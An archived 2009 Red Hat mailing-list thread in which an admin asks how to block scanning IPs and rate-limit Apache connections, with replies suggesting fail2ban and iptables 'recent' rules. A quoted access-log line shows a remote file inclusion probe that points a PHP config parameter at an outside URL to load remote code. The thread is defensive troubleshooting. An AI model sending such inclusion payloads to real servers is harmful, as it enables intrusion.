2009/7/8 Manuel Aróstegui <manuel@xxxxxxxxxxxxxx> > El mié, 08-07-2009 a las 09:58 +0200, ESGLinux escribió: > > Hi all, > > I´m having a problem with an Apache web server. > > > > I get a lot of access ot this kind: > > > > > > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET > > //includes/mailaccess/pop3.php?CONFIG[pear_dir]= > http://aboutav.com//id1.txt??? > > HTTP/1.1" 404 1015 "-" "Mozilla/5.0" > > > > where x.x.x.x is the ip of the client, I suposse this ip is trying to > find a > > security hole in my system, so what I do manually is this: > > > > iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP > > > > I want to do this automatically. I´m thinking to use logwatch but I´m not > > sure how to do it. (I´m testing but for the moment I haven´t found the > > solution) > > You might want to test fail2ban: > http://www.fail2ban.org/wiki/index.php/Main_Page Hey, I think this software does exactly what I want. I´m going to give it a try. > <http://www.fail2ban.org/wiki/index.php/Main_Page> > > > > > > By the way, I´m interesting to limit the connections to my webserver > using > > iptables with limit module and busrt argument. What do you think about > it? > > is a good solution or I´m on the wrong way? Do you know how to prevent > DOS > > attacks? > > The first approach that comes to my mind would be something like: > > iptables -N APACHE_CHECK > iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK > iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name > APACHE > iptables -A APACHE_CHECK -m state --state NEW -m recent --update > --seconds 60 --hitcount 4 --name APACHE > iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck > --seconds 60 --hitcount 4 --name APACHE -j DROP > > This will prevent you from small DoS attempts from the same IP within 1 > minute. I like this kind of solution but I think this rules doesnt work. with them the webserver does not respond to a single petition. I have loaded this in my test computer: iptables -N APACHE_CHECK iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name APACHE iptables -A APACHE_CHECK -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name APACHE iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j LOG iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j DROP I have added the rule to log when the packets are dropped and it logs every packet, what is wrong? Thanks for your asnwer ESG > > > Manuel. > -- > Manuel Arostegui Ramirez. > > Electronic Mail is not secure, might not be read every day, and should not > be used for urgent or sensitive issues. > > -- > redhat-list mailing list > unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe > https://www.redhat.com/mailman/listinfo/redhat-list > -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subjecthttps://www.redhat.com/mailman/listinfo/redhat-list
